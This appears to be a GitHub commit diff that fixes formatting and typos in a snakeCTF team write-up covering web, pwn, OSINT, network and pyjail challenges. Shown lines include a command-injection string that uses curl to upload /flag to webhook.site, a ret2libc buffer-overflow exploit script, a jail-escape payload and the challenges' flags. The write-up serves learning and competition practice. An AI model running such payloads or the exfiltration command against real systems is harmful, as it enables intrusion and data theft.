-
Notifications
You must be signed in to change notification settings - Fork 12
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
24 additions
and
18 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
|
|
@@ -504,7 +504,7 @@ Let's change the location with the following and ask for a new preview: | |
|
|
||
| `https://webhook.site/YOUR_UUID/start" && curl -X POST -H "Content-Type: multipart/form-data" -F "data=@/flag" https://webhook.site/YOUR_UUID/flag && cat -- "` | ||
|
|
||
| 🏁 _snakeCTF{I_th0ugh7_it_w4s_4_k1tten}_{:.spoiler} | ||
| 🏁 _snakeCTF{I\_th0ugh7\_it\_w4s\_4\_k1tten}_{:.spoiler} | ||
|
|
||
| # Pwn | ||
|
|
||
|
|
@@ -563,18 +563,19 @@ int __cdecl main(int argc, const char **argv, const char **envp) | |
| We can see that read() is vulnerable to buffer overflow, and if we look with checksec, we see that no protections are active except for NX. | ||
| Also, you can find the libc version used by checking inside the docker environment. | ||
| The way to solve this is to exploit the bof two times: | ||
| The way to solve this is to exploit the bof two times: | ||
| get a libc leak by printing a got address and calculate libc base address, then return to main and exploit the bof again to return to one_gadget that will call system("/bin/sh"). | ||
| Here is the script: | ||
| Here is the script: | ||
| ```python | ||
| def main(): | ||
| offset = 40 | ||
| offset = 40 | ||
| rop = ROP(exe) | ||
| # bof to leak libc | ||
| payload = flat( | ||
| payload = flat( | ||
| 'A' * offset, | ||
| p64(rop.find_gadget(['pop rdi', 'ret']).address), | ||
| p64(exe.got.puts), | ||
|
|
@@ -583,14 +584,14 @@ def main(): | |
| ) | ||
| sl(payload) | ||
| ru("it!\n") | ||
| leak = u64(rl()[:-1] + b'\x00' * 2) # libc leak | ||
| libc.address = leak - libc.sym.puts # find libc base addr | ||
| rop2 = ROP(libc) | ||
| # ret2 one_gadget after setting constraints | ||
| payload2 = flat( | ||
| 'A' * offset, | ||
| 'A' * offset, | ||
| p64(rop2.find_gadget(['pop r15', 'ret']).address), | ||
| p64(0), | ||
| p64(rop2.find_gadget(['pop r12', 'ret']).address), | ||
|
|
@@ -602,7 +603,7 @@ def main(): | |
| r.interactive() | ||
| ``` | ||
|
|
||
| 🏁 _snakeCTF{w3lc0m3_70_5n4k3c7f_pwn3r}_{:.spoiler} | ||
| 🏁 _snakeCTF{w3lc0m3\_70\_5n4k3c7f\_pwn3r}_{:.spoiler} | ||
|
|
||
| # OSINT | ||
|
|
||
|
|
@@ -625,7 +626,7 @@ def main(): | |
| > <span>1. e4 e5 2. b3 *</span><br><br> | ||
| > Flag format: snakeCTF{TheNameOfTheAttack} | ||
| We took like one second to understand that the symbols were a notation for a chess opening move. We took a ridicoulus amount of time to find the correct attack and flag format. Looking on Google we found different names for this opening like the `Charles opening`. There was nothing very fun about the solution, we just realized that Christmas was actually useful for the search and we found the Santa Claus Opening. What did we learn with this challenge? If playing chess someone made me a Santa Claus opening I would know how to annihilate him. | ||
| We took like one second to understand that the symbols were a notation for a chess opening move. We took a ridiculous amount of time to find the correct attack and flag format. Looking on Google we found different names for this opening like the `Charles opening`. There was nothing very fun about the solution, we just realized that Christmas was actually useful for the search and we found the Santa Claus Opening. What did we learn with this challenge? If playing chess someone made me a Santa Claus opening I would know how to annihilate him. | ||
|
|
||
|  | ||
|
|
||
|
|
@@ -636,27 +637,28 @@ We took like one second to understand that the symbols were a notation for a che | |
| > Hey! We intercepted this strange message, I think we finally found them. Let me know if you find something | ||
| In this challenge we are given an email (info.eml) that contain the message: | ||
|
|
||
| ```plaintext | ||
| service information: | ||
| °°°°°°°°°°°°°°°°°°°°°°the usual link has changed | ||
| paste it somewhere and delete this mail after. | ||
| ``` | ||
|
|
||
| There are no strange headers to analyze so we excluded the path of email forensics analysis. At this point we focused on the sender and receiver emails: `[email protected]` and `[email protected]`. Using Osint tools for emails we didn't find anything interesting. Then we thought that the message of the mail could be somehow important. Maybe `[email protected]` had pasted something on the internet! We looked on Pastebin, the most popular place on internet to paste text, and we quickly found the [profile of wazzujf2](https://pastebin.com/u/wazzujf2) and its only note: | ||
|
|
||
| ```plaintext | ||
| For my favourite shop!!!!!!! -> https://e2ueln4vgn6qj2q4vwkcntkeg3ftinizb3ewjkahd2aoior33dbts3qd.onion | ||
| user: [email protected] | ||
| pass: hYpYxWRvHvKBzDes (i hope this is secure enough) | ||
| todo: burn this! | ||
| ``` | ||
|
|
||
| After visiting the url and logging in the with the credentials in the note, the flag appears in plaintext. | ||
|
|
||
|
|
||
| 🏁 _snakeCTF{h1dd3n\_s3rv1ce5\_4re_fuN\_t0\_bu1ld}_{:.spoiler} | ||
|
|
||
| # Network | ||
|
|
@@ -686,7 +688,7 @@ We are not given many information in this challenge just a mention to IPAM so so | |
| link/ether ce:22:7c:6f:80:a7 brd ff:ff:ff:ff:ff:ff | ||
| inet 10.10.0.1/23 scope global chall | ||
| valid_lft forever preferred_lft forever | ||
| 1350: eth0@if1351: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default | ||
| 1350: eth0@if1351: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default | ||
| link/ether 02:42:ac:11:1f:03 brd ff:ff:ff:ff:ff:ff link-netnsid 0 | ||
| inet 172.17.31.3/24 brd 172.17.31.255 scope global eth0 | ||
| valid_lft forever preferred_lft forever | ||
|
|
@@ -855,7 +857,7 @@ And the resulting image: | |
| > I want to read an env variable, but I'm getting stressed out because of that blacklist!!! Would you help me plz? :(<br><br> | ||
| > nc misc.snakectf.org 1700 | ||
| Everyone loves pyjails. | ||
| Everyone loves pyjails. | ||
|
|
||
| ```python | ||
| #!/usr/bin/env python3 | ||
|
|
@@ -908,8 +910,8 @@ class Jail(): | |
| , "join", "__dict__", "__dir__", "__getstate__", "upper"] | ||
|
|
||
|
|
||
| if (code.isascii() and | ||
| all([x not in code for x in badchars]) and | ||
| if (code.isascii() and | ||
| all([x not in code for x in badchars]) and | ||
| all([x not in code for x in badwords])): | ||
|
|
||
| exec(code) | ||
|
|
@@ -925,15 +927,18 @@ if (__name__ == "__main__"): | |
|
|
||
| In this one the goal is to call the get_var function to get the value of the env var FLAG. We cannot use a bunch of letters, symbols and builtins functions. So the first thing we did was to enumerate all the available things that we had: | ||
|
|
||
| ```plaitext | ||
| ```plaintext | ||
| Letters and symbols: a b d e f g i l m r s t v ( ) * + , . : _ | ||
| Builtins: ['abs', 'all', 'delattr', 'dir', 'id', 'list', 'reversed', 'set'] | ||
| ``` | ||
|
|
||
| It was also immediately clear that the F,L,A,G variables were there for a reason and had to be used. Putting things together made us realize that the dir function can be useful to get a list of symbols. `dir(self)` returned this list: | ||
|
|
||
| ```python | ||
| ['A', 'F', 'G', 'L', '__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', 'get_var', 'run_code'] | ||
| ``` | ||
| So we had a list with the letters we needed to compose the word "FLAG", we just needed to find a way to get elements of it without using `[]`. The `__getitem__` function came in handy for that purpose. The last thing we needed was a way to create integer indexes (from 0 to 3) to get the letters from the list. We tried for a second to look for a fancy solution and then we immediately gave up and found the ugliest solution possible: | ||
|
|
||
| So we had a list with the letters we needed to compose the word "FLAG", we just needed to find a way to get elements of it without using `[]`. The `__getitem__` function came in handy for that purpose. The last thing we needed was a way to create integer indexes (from 0 to 3) to get the letters from the list. We tried for a second to look for a fancy solution and then we immediately gave up and found the ugliest solution possible: | ||
|
|
||
| ```python | ||
| all(dir(list)).real # = 1 | ||
|
|
@@ -944,6 +949,7 @@ Putting everything together turned into this beautiful payload: | |
| ```python | ||
| self.get_var((dir(self).__getitem__(all(dir(list)).real)) + (dir(self).__getitem__(( all(dir(list)).real + all(dir(list)).real + all(dir(list)).real ))) + (dir(self).__getitem__(all(dir(list)).real.__gt__( all(dir(list)).real).real)) + (dir(self).__getitem__(( all(dir(list)).real + all(dir(list)).real )))) | ||
| ``` | ||
|
|
||
| Was is the best solution? Probably not. Did we care about it? Not at all. | ||
|
|
||
| 🏁 _snakeCTF{7h3\_574r\_d1d\_7h3\_j0b}_{:.spoiler} | ||